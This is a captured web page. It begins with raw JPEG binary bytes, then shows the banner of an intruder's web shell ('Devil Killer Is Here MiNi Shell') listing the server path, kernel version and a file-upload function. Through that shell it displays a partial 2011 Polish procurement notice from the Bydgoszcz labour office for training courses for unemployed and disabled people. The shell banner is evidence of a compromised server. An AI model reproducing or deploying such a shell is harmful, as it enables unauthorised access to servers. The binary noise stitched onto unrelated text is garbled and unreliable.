JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110516/138585-N-2011.html

<p class="kh_header"><b>Bydgoszcz: ZORGANIZOWANIE I PRZEPROWADZENIE SZKOLEŃ GRUPOWYCH DLA OSÓB BEZROBOTNYCH I NIEPEŁNOSPRAWNYCH POSZUKUJĄCYCH PRACY 
NIEPOZOSTAJĄCYCH W ZATRUDNIENIU</b><br>
<b>Numer ogłoszenia: 138585 - 2011; data zamieszczenia: 16.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Bydgoszczy , ul. Toruńska 147, 85-950 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 36-04-300, faks 052 36-04-341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.bydgoszcz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.pup.bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZORGANIZOWANIE I PRZEPROWADZENIE SZKOLEŃ GRUPOWYCH DLA OSÓB BEZROBOTNYCH I NIEPEŁNOSPRAWNYCH POSZUKUJĄCYCH PRACY 
NIEPOZOSTAJĄCYCH W ZATRUDNIENIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa zorganizowania i przeprowadzenia szkoleń grupowych dla osób bezrobotnych i niepełnosprawnych poszukujących pracy niepozostających w zatrudnieniu, finansowanych ze środków Europejskiego Funduszu Społecznego (projekt systemowy Uczymy się, zostajemy, pracujemy Poddziałanie 6.1.3. w ramach PO KL), Funduszu Pracy i Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych.
Zamawiający dopuszcza możliwość składania ofert częściowych. Każdy z Wykonawców może złożyć ofertę na jedną lub więcej części zamówienia
Zamówienie składa się z 10 części:
Część 1 - Operator koparki i ładowarki,
Część 2 - Operator wózków podnośnikowych,
Część 3 - Eksploatacja urządzeń, instalacji i sieci elektroenergetycznych do 1 kV,
Część 4 - Spawacz blach i rur spoinami pachwinowymi metodą elektryczną (elektrody otulone), metodą MAG i TIG 
Część 5 - Opiekun dzieci oraz osób przewlekle chorych i  niepełnosprawnych,
Część 6 - Księgowość komputerowa,
Część 7 - Florysta, 
Część 8 - Fakturzysta z obsługą kasy fiskalnej,
Część 9 - Kucharz małej gastronomii,
Część 10 - Magazynier z obsługą wózków podnośnikowych  i komputera - fakturowanie komputerowe.
1)	CZAS TRWANIA I SPOSÓB ORGANIZACJI SZKOLENIA
a)	Zamawiający wymaga, aby zajęcia odbywały się 5 razy w tygodniu, od poniedziałku do piątku po 8 godzin zegarowych dziennie. Godzina  zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min oraz przerwę, liczącą 15 minut. W przypadku zajęć praktycznych zamawiający dopuszcza mniejszą ilość godzin szkolenia, o ile wynika to z przepisów szczególnych. W takim wypadku należy wskazać te przepisy.
b)	Zamawiający wyklucza możliwość organizacji zajęć weekendowych lub popołudniowych (tj. po godz. 17.00). 
c)	W przypadku realizacji szkoleń trwających miesiąc lub krócej niż miesiąc realizacja szkolenia musi rozpocząć się i zakończyć w miesiącu kalendarzowym.

2)	MIEJSCE REALIZACJI SZKOLENIA
Miejscem realizacji zajęć teoretycznych musi być miasto Bydgoszcz. Zamawiający wymaga, aby do miejsca prowadzenia zajęć teoretycznych była możliwość dojazdu komunikacją publiczną (np. MZK, bus).
Zamawiający dopuszcza możliwość realizacji zajęć praktycznych poza Bydgoszczą. Jednak w takim przypadku wykonawca zobowiązany jest zapewnić na własny koszt dojazd uczestników szkolenia w to miejsce.
Wykonawca zobowiązany jest w formularzu oferty - załącznik nr 2 do SIWZ wskazać dokładny adres miejsca realizacji zajęć teoretycznych i praktycznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania poprzez posiadanie  wpisu jednostki szkoleniowej do Rejestru Instytucji Szkoleniowych zgodnie z art. 20 ustawy o promocji zatrudnienia i instytucjach rynku pracy z dnia 20 kwietnia 2004r. (Dz. U z 2008. Nr 69, poz. 415 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia poprzez:
a)	dysponowanie narzędziami, wyposażeniem zakładu i urządzeniami technicznymi niezbędnymi do realizacji poszczególnej części zamówienia poprzez posiadanie:
-	zaplecza technicznego do przeprowadzenia poszczególnych części zamówienia zgodnie z właściwymi przepisami wskazującymi na wymagania, aby szkolenie było przeprowadzone na właściwym poziomie,
-	pomieszczeń umożliwiających realizację zajęć teoretycznych poszczególnej części zamówienia dostosowanych do potrzeb danego szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia oraz o zlikwidowanych barierach architektonicznych umożliwiającym osobom niepełnosprawnym udział w szkoleniu  tzn. sali szkoleniowej dostosowanej do ilości osób szkolonych z odpowiednią liczbą miejsc i stolików, oświetleniem, ogrzewaniem i wentylacją. 
-	pomieszczeń lub placu umożliwiających realizację zajęć praktycznych poszczególnej części zamówienia dostosowanych do potrzeb danego szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia.
-	wyposażenia dydaktycznego umożliwiającego realizację zajęć teoretycznych poszczególnej części zamówienia tzn. flipchart lub tablica klasyczna lub magnetyczna, sprzęt audiowizualny, ilość stanowisk komputerowych zapewniających podczas zajęć indywidualny dostęp uczestnikom szkolenia do komputera.
-	wyposażenia umożliwiającego realizację zajęć praktycznych poszczególnej części zamówienia.
-	maszyn i innych urządzeń technicznych umożliwiających realizację zajęć teoretycznych i praktycznych poszczególnej części zamówienia z uwzględnieniem bezpiecznych i higienicznych warunków pracy przy ich eksploatacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie kadry dydaktycznej z wykształceniem, kwalifikacjami i doświadczeniem niezbędnym do realizacji poszczególnej części zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zamawiający na potwierdzenie, że oferowana usługa szkolenia odpowiada jego wymaganiom wymaga złożenia przez wykonawcę:
1)	Harmonogramu kursu - zgodnie ze wzorem zamawiającego - załącznik nr 7 do SIWZ,
2)	Kalkulacji kosztów szkolenia - załącznik nr 8 do SIWZ. W szczegółowej kalkulacji kosztów szkolenia należy:
a)	uwzględnić koszt cateringu w wysokości 10 zł dzienne na jednego uczestnika szkolenia (Zamawiający wymaga, aby wykonawca w ramach cateringu zapewnił każdemu uczestnikowi szkolenia napój zimny i ciepły oraz kanapkę i drożdżówkę).
b)	nie uwzględniać kosztów ubezpieczenia od NNW. Wykonawca zobowiązany jest na własny koszt ubezpieczyć wszystkich uczestników szkolenia od NNW.
3)	Programu szkolenia (załącznik nr 9 do SIWZ) zgodnie z opisem zamawiającego zawartym w załączniku nr 1 do SIWZ - szczegółowy opis przedmiotu zamówienia.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - AKREDYTACJA  w zakresie przedmiotu poszczególnej części  zamówienia - 30</li>
<li>3 - CERTYFIKAT JAKOŚCI USŁUG - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy, o której mowa w punkcie 16.1. SIWZ  na pisemny wniosek wykonawcy złożony najpóźniej w dniu zaistnienia okoliczności uzasadniających zmianę, za zgodą wyrażoną przez zamawiającego na piśmie w zakresie:
1)	zmiany terminu realizacji szkolenia,
2)	zmiany kadry dydaktycznej wykonawcy w wyniku zdarzeń, których nie można było przewidzieć w dniu zawarcia umowy (np. choroba, śmierć itp.), Zamawiający zastrzega jednak, że w przypadku zmiany wykładowcy wykonawca zobowiązany jest zapewnić, aby nowy wykładowca posiadał minimalnie kwalifikacje, wykształcenie i doświadczenie osoby, która została wskazana w wykazie kadry dydaktycznej- załącznik nr 5 do SIWZ, na którego podstawie dokonano wyboru Wykonawcy,
3)	zmiany uczestników szkolenia w przypadku:
a)	niepodjęcia lub rezygnacji przez uczestnika  ze szkolenia,
b)	niestawienia się uczestnika na szkoleniu,
c)	przerwania przez uczestnika uczestnictwa w szkoleniu,
d)	stwierdzenia niezdolności uczestnika do uczestnictwa w szkoleniu,
4)	zmiany harmonogramu szkolenia i innej dokumentacji szkolenia, gdy konieczność jej dokonania wynika ze zdarzeń, których nie można było przewidzieć w dniu zawarcia umowy,
5)	zmiany miejsca wykonywania zamówienia (realizacji zajęć), gdy konieczność jej dokonania wynika ze zdarzeń, których nie można było przewidzieć w dniu zawarcia umowy. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w punkcie 5.1. podpunkt 3a SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pup.bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Bydgoszczy
ul. Toruńska 147, 85-950 Bydgoszcz
II piętro, pokój 207, sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2011 godzina 08:30, miejsce: Powiatowy Urząd Pracy w Bydgoszczy
ul. Toruńska 147, 85-950 Bydgoszcz
II piętro, pokój 207, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest finansowany ze środków Europejskiego Funduszu Społecznego (projekt systemowy Uczymy się, zostajemy, pracujemy Poddziałanie 6.1.3. w ramach PO KL)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> SZKOLENIE O NAZWIE OPERATOR KOPARKI I ŁADOWARKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Liczba kursów i uczestników szkolenia 
a)	Liczba kursów - 2 (sierpień, październik)
b)	Liczba uczestników wszystkich kursów (całego zamówienia) - 20 uczestników.
c)	Maksymalna liczba uczestników jednego kursu wynosi - 10 uczestników. 
d)	Minimalna liczba uczestników jednego kursu wynosi - 8 uczestników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Akredytacja w zakresie przedmiotu poszczególnej części zamówienia - 30</li>
<li>3. Certyfikat jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> SZKOLENIE O NAZWIE OPERATOR WÓZKÓW PODNOŚNIKOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Liczba kursów i uczestników szkolenia 
a)	Liczba kursów - 2 (wrzesień, listopad)
b)	Liczba uczestników wszystkich kursów (całego zamówienia) - 20 uczestników.
c)	Maksymalna liczba uczestników jednego kursu wynosi - 10 uczestników. 
d)	Minimalna liczba uczestników jednego kursu wynosi - 8 uczestników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Akredytacja w zakresie przedmiotu poszczególnej części zamówienia - 30</li>
<li>3. Certyfikat jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> SZKOLENIE O NAZWIE EKSPLOATACJA URZĄDZEŃ, INSTALACJI I SIECI ELEKTROENERGETYCZNYCH DO 1 kV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Liczba kursów i uczestników szkolenia 
a)	Liczba kursów - 2 (lipiec, październik)
b)	Liczba uczestników wszystkich kursów (całego zamówienia) - 20 uczestników.
c)	Maksymalna liczba uczestników jednego kursu wynosi - 10 uczestników. 
d)	Minimalna liczba uczestników jednego kursu wynosi - 8 uczestników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Akredytacja w zakresie przedmiotu poszczególnej części zamówienia - 30</li>
<li>3. Certyfikat jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> SZKOLENIE O NAZWIE SPAWACZ BLACH I RUR SPOINAMI PACHWINOWYMI  METODĄ ELEKTRYCZNĄ (ELEKTRODĄ OTULONĄ), METODĄ MAG i TIG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Liczba kursów i uczestników szkolenia 
a)	Liczba kursów - 1 (sierpień)
b)	Liczba uczestników wszystkich kursów (całego zamówienia) - 20 uczestników.
c)	Maksymalna liczba uczestników jednego kursu wynosi - 20 uczestników. 
d)	Minimalna liczba uczestników jednego kursu wynosi - 18 uczestników.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Akredytacja w zakresie przedmiotu poszczególnej części zamówienia - 30</li>
<li>3. Certyfikat jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> SZKOLENIE O NAZWIE OPIEKUN DZIECI ORAZ OSÓB PRZEWLEKLE CHORYCH I NIEPEŁNOSPRAWNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Liczba kursów i uczestników szkolenia 
a)	Liczba kursów - 1 (październik)
b)	Liczba uczestników wszystkich kursów (całego zamówienia) - 10 uczestników.
c)	Maksymalna liczba uczestników jednego kursu wynosi - 10 uczestników. 
d)	Minimalna liczba uczestników jednego kursu wynosi - 8 uczestników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Akredytacja w zakresie przedmiotu poszczególnej części zamówienia - 30</li>
<li>3. Certyfikat jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> SZKOLENIE O NAZWIE KSIĘGOWOŚĆ KOMPUTEROWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Liczba kursów i uczestników szkolenia 
a)	Liczba kursów - 2 (sierpień, październik)
b)	Liczba uczestników wszystkich kursów (całego zamówienia) - 30 uczestników.
c)	Maksymalna liczba uczestników jednego kursu wynosi - 15 uczestników. 
d)	Minimalna liczba uczestników jednego kursu wynosi - 13 uczestników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
